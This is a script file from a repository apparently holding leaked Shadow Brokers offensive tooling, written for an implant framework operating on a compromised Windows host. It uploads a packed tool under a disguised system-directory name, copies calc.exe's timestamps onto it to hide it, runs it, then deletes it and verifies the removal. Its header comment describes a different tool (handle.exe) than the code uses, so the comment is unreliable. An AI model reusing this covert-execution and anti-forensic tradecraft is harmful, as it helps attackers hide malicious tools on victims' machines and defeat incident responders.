shadowbrokers-exploits/windows/Resources/Ep/Scripts/promiscdetect.eps
2017-04-14 11:45:07 +02:00

43 lines
1.3 KiB
PostScript

#-------------------------------------------------------------------------------
# File: handle.eps
# Description: Uploads the handle.exe tool to the targets temp directory.
# It then executes it with -a.
# It will then delete the uploaded file and return the
# targets system directory.
# 25 July 2007 Created....
#
#-------------------------------------------------------------------------------
string $ScriptsDir = GetEnv("SCRIPTSDIR");
string $sSysPath = GetEnv("SYSPATH");
string $remoteToolName = GetEnv("remoteToolName");
if ($remoteToolName == "") {
$remoteToolName="$sSysPath\\cmdl16.exe";
}
ifnot (prompt "Do you want to upload the tool as \"$remoteToolName\" ?") {
$remoteToolName=GetInput("What do you want to upload the tool as?");
}
SetEnv("remoteToolName", "$remoteToolName");
string $split = SplitPath("$remoteToolName");
@echo on;
ifnot (`put $ScriptsDir\\..\\..\\..\\tools\\promiscdetect_safe_packed.exe -name $remoteToolName`) {
echo "File already exists?";
return false;
}
`matchtimes $sSysPath\\calc.exe $remoteToolName`;
prompt `run -command "$remoteToolName" -redirect handle`;
if (prompt `del $split[1] -path "$split[0]"`){
sleep(300);
`dir $split[1] -path "$split[0]"`;
}
return true;